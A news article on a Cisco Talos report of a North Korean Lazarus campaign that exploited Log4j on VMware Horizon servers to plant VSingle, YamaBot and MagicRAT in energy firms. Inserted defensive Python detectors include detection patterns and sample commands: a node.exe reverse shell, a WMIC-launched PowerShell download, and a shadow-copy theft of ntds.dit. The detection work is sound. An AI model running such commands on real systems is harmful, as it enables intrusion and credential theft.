Lazarus APT group exploits Log4j vulnerability on exposed VMware Horizon servers to target energy firms

Researchers at Cisco Talos have been tracking a new campaign operated by the Lazarus advanced persistent threat (APT) group, attributed to North Korea by the U.S. government. Between February and July this year, the group is said to have exploited Log4j vulnerabilities in VMware Horizon servers to gain an initial foothold into targeted organizations, including energy providers around the world, among them organizations headquartered in the U.S., Canada, and Japan. 

Cisco assesses that the campaign is meant to infiltrate organizations worldwide to establish long-term access and subsequently exfiltrate data of interest to the adversary’s nation-state. The researchers discovered the use of two known malware families in these intrusions, VSingle and YamaBot, as well as a recently disclosed implant that Cisco Talos calls ‘MagicRAT.’

“This campaign was previously partially disclosed by other security firms, but our findings reveal more details about the adversary’s modus operandi,” Jung soo An, Asheer Malhotra, and Vitor Ventura, Cisco Talos researchers, wrote in a blog post. “We have also observed an overlap of command and control (C2) and payload-hosting infrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) June advisory that detailed continued attempts from hackers to compromise vulnerable VMware Horizon servers.”

In April, Symantec, a division of Broadcom Software, disclosed that the Lazarus group has been conducting an espionage campaign targeting organizations operating within the chemical sector. The campaign appears to be a continuation of Lazarus’ activity dubbed ‘Operation Dream Job,’ initially observed in August 2020. Symantec tracks this subset of Lazarus activity under the name Pompilus.

The Cisco researchers said that the main goal of the Lazarus APT attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property,” they added.

The post said that Cisco Talos assesses with high confidence that these attacks have been conducted by the North Korean state-sponsored Lazarus Group. “During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle, YamaBot), describing them in detail and attributed the campaigns to the Lazarus threat actor,” it added.

The researchers also said that the TTPs (tactics, techniques, and procedures) used in these attacks point to the Lazarus group, which exploited the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of the group’s toolkit from web servers. The same initial vector, URL patterns, and similar subsequent hands-on-keyboard activity have been described in the AhnLab report from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[dot]38.133[dot]145, which was used as a hosting platform for the hackers’ malicious tools. 

“Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus,” according to the researchers. 

“Additionally, we’ve also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we’ve observed the use of VSingle, YamaBot, and MagicRAT.” In July, U.S. agencies released a joint cybersecurity advisory warning of North Korean state-sponsored hackers using Maui ransomware to target the healthcare and public health sector since at least May 2021.

Cisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium confidence, “however, we’re raising our confidence level when analyzing all these points in the context of the campaign and victims,” the researchers said.

The researchers identified the exploitation of the Log4Shell vulnerability on VMware Horizon public-facing servers as the initial attack vector. A series of activities follow the compromise to establish a foothold on the systems before the attackers deploy additional malware and move laterally across the network.

“During our investigation, we discovered two different foothold payloads. In the first, the attackers abuse node.exe, which is shipped with VMware to execute the oneliner node.exe script,” they added. “This essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint.”

In another victim’s network, “we saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the enterprise,” according to the researchers. “What’s unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems,” they added.

The researchers said that MagicRAT was configured with a different configuration file and path in this campaign. “It also reported to different C2 servers. The configuration directory is now called ‘MagicMon’ in the current user’s AppData\Roaming directory.” The folder “creates and hosts an initialization file named ‘MagicSystem[dot]ini.’ This INI file contains several configurations including the list of C2 URLs that can be used by the implant to send and receive commands and data,” they added.
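The configuration artifact described above gives defenders a concrete host-based hunt: look in every user profile for an AppData\Roaming\MagicMon folder holding MagicSystem.ini and pull any C2 URLs out of it for blocking and pivoting. The script below is an added example, not Cisco Talos code; the layout of the INI file is not published on this page, so the sample file it builds and the URL extraction are assumptions.

```python
r"""Hunt for the MagicRAT configuration artifact described in the article.

Added example (not Cisco Talos code). The folder and file names come from the
article; the INI layout, the constructed profile tree and the URL extraction
are assumptions made for illustration.
"""
import re
import tempfile
from pathlib import Path

ARTIFACT_DIR = ("AppData", "Roaming", "MagicMon")   # folder named in the article
ARTIFACT_FILE = "MagicSystem.ini"                     # file named in the article
# Any http(s) URL in the file; conservative delimiter set so INI values split cleanly.
URL_RX = re.compile(r"https?://[^\s;,\"']+", re.IGNORECASE)


def hunt_magicmon(profiles_root):
    """Walk every user profile under profiles_root (for example a mounted
    C:\\Users from a disk image) and return one record per artifact found."""
    hits = []
    for profile in sorted(Path(profiles_root).iterdir()):
        ini = profile.joinpath(*ARTIFACT_DIR, ARTIFACT_FILE)
        if ini.is_file():
            text = ini.read_text(errors="replace")
            urls = sorted(set(URL_RX.findall(text)))   # candidate C2 URLs for blocklists
            hits.append({"profile": profile.name, "path": str(ini), "c2_urls": urls})
    return hits


def build_sample_profile_tree(base):
    """Constructed fixture: one clean profile and one carrying the artifact.
    The INI content is a hypothetical layout, not the real MagicRAT format."""
    clean = Path(base, "alice", *ARTIFACT_DIR[:2])
    clean.mkdir(parents=True)
    (clean / "Microsoft").mkdir()
    bad = Path(base, "bob", *ARTIFACT_DIR)
    bad.mkdir(parents=True)
    (bad / ARTIFACT_FILE).write_text(
        "[C2]\n"
        "url1=http://c2.example.invalid/magic/gate.php\n"
        "url2=https://backup.example.invalid:8443/upload\n"
        "[misc]\n"
        "interval=60\n"
    )
    return base


def demo():
    """Build the constructed tree in a temp dir and run the hunt over it."""
    with tempfile.TemporaryDirectory() as tmp:
        return hunt_magicmon(build_sample_profile_tree(tmp))


if __name__ == "__main__":
    for hit in demo():
        print(hit["profile"], hit["path"], hit["c2_urls"])
```

On a live host the same function can be pointed at the real profiles root; on a forensic image, at the mounted Users directory. Matching on the exact directory and file name keeps the hunt cheap and low on false positives, while the extracted URLs feed proxy and DNS blocklists.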

During the first few days after the successful initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families, MagicRAT and VSingle, on the infected endpoint to maintain covert access to the system, the researchers said. “Just like with the first victim, the attackers then started to perform Active Directory (AD) related explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below illustrates the commands executed to perform such actions,” they added.

The researchers observed that once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify whether they are reachable (with an occasional tracert). VSingle deployment on new hosts was done using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system. In some infections, “we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell. This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors on the commands,” they added.

“During one particular intrusion, the attackers first deployed VSingle on the endpoint,” the Cisco researchers said. “However, after the VSingle sample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed attempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After maintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot,” they added.

The researchers added that YamaBot is a custom-made, Go-based malware family. It uses HTTP to communicate with its C2 servers. It typically begins by sending preliminary system information about the infected endpoint to the C2: computer name, username, and MAC address.

The implant has standard RAT capabilities, including listing files and directories, sending process information to C2, downloading files from remote locations, executing arbitrary commands on the endpoints, and uninstalling itself. “Apart from the usual recon and deployment of the custom implants, we also observed Lazarus’ use of completely different TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy of the ‘ntds[dot]dit’ file for exfiltration containing Active Directory data,” the researchers added.
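Three of the hands-on-keyboard behaviours the article describes leave clear traces in process-creation telemetry: node.exe on the Horizon server running an inline script that opens a reverse shell, WMIC starting a remote process whose payload is a PowerShell download cradle, and a volume shadow copy being created shortly before ntds.dit is copied out. The detector below is an added example, not Cisco Talos code; the event fields, process names, and command lines in the sample telemetry are constructed for illustration rather than taken from the campaign.

```python
"""Detection logic for the process-level behaviours described in the article,
run over constructed Windows process-creation events.

Added example (not Cisco Talos code). The event shape, parent/child process
names and sample command lines are assumptions made for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str       # endpoint that generated the event
    parent: str     # parent process image name
    image: str      # created process image name
    cmdline: str    # full command line of the created process


def _rx(pattern):
    return re.compile(pattern, re.IGNORECASE)


NODE_INLINE = _rx(r"\bnode(\.exe)?\b.*\s-e\s")                        # node -e "<script>"
NODE_NET = _rx(r"child_process|net\.(connect|Socket)|\.connect\(")      # socket or shell spawn
WMIC_REMOTE = _rx(r"\bwmic(\.exe)?\b.*/node:.*process\s+call\s+create")  # remote process start
PS_DOWNLOAD = _rx(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer")
SHADOW_CREATE = _rx(r"vssadmin(\.exe)?\s+create\s+shadow|wmic(\.exe)?\s+shadowcopy\s+call\s+create|ntdsutil.*\bifm\b")
NTDS_COPY = _rx(r"ntds\.dit")


def is_node_reverse_shell(ev):
    """node.exe running an inline script that opens a socket or spawns a shell,
    or node.exe itself spawning a command interpreter."""
    inline = (ev.image.lower() == "node.exe"
              and NODE_INLINE.search(ev.cmdline) and NODE_NET.search(ev.cmdline))
    child_shell = ev.parent.lower() == "node.exe" and ev.image.lower() in {"cmd.exe", "powershell.exe"}
    return bool(inline or child_shell)


def is_wmic_remote_download(ev):
    """WMIC creating a process on another host whose payload is a PowerShell download cradle."""
    return bool(WMIC_REMOTE.search(ev.cmdline)
                and "powershell" in ev.cmdline.lower()
                and PS_DOWNLOAD.search(ev.cmdline))


def detect(events):
    """Return sorted, de-duplicated (host, rule) findings over an ordered event stream.
    The ntds.dit rule is stateful: it only fires on hosts where a shadow copy
    was created earlier in the stream."""
    findings = set()
    shadow_hosts = set()
    for ev in events:
        if SHADOW_CREATE.search(ev.cmdline):
            shadow_hosts.add(ev.host)
        if is_node_reverse_shell(ev):
            findings.add((ev.host, "node_reverse_shell"))
        if is_wmic_remote_download(ev):
            findings.add((ev.host, "wmic_remote_powershell_download"))
        if NTDS_COPY.search(ev.cmdline) and ev.host in shadow_hosts:
            findings.add((ev.host, "ntds_dit_copy_after_shadow_copy"))
    return sorted(findings)


# Constructed sample telemetry (hypothetical hosts, TEST-NET addresses, placeholder parent names).
SAMPLE_EVENTS = [
    ProcEvent("horizon-01", "HorizonService.exe", "node.exe",
              "node.exe -e \"var s=require('net').connect(443,'192.0.2.10');"
              "require('child_process').spawn('cmd.exe')\""),
    ProcEvent("horizon-01", "node.exe", "cmd.exe", "cmd.exe"),
    ProcEvent("ws-admin-03", "cmd.exe", "wmic.exe",
              "wmic /node:fs-02 process call create \"powershell -c (New-Object Net.WebClient)"
              ".DownloadFile('http://192.0.2.20/s.exe','C:\\Windows\\Temp\\s.exe')\""),
    ProcEvent("dc-01", "cmd.exe", "vssadmin.exe", "vssadmin create shadow /for=C:"),
    ProcEvent("dc-01", "cmd.exe", "cmd.exe",
              r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\n.dit"),
    ProcEvent("dev-07", "explorer.exe", "node.exe", "node.exe build.js"),          # benign
    ProcEvent("ws-admin-03", "cmd.exe", "powershell.exe", "powershell -c Get-Process"),  # benign
]


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The shadow-copy rule is deliberately stateful: copying ntds.dit alone is rare but legitimate during backups, whereas a shadow copy followed by a copy of ntds.dit on the same host is the credential-harvesting sequence described above. In production the same predicates map directly onto Sysmon event ID 1 or EDR process-creation fields.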

Last month, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team identified that an Iran-based threat group, Mercury, has been exploiting Log4j 2 vulnerabilities in SysAid applications across Israeli organizations. Furthermore, MSTIC assesses with high confidence that Mercury’s observed activity was affiliated with Iran’s Ministry of Intelligence and Security (MOIS).
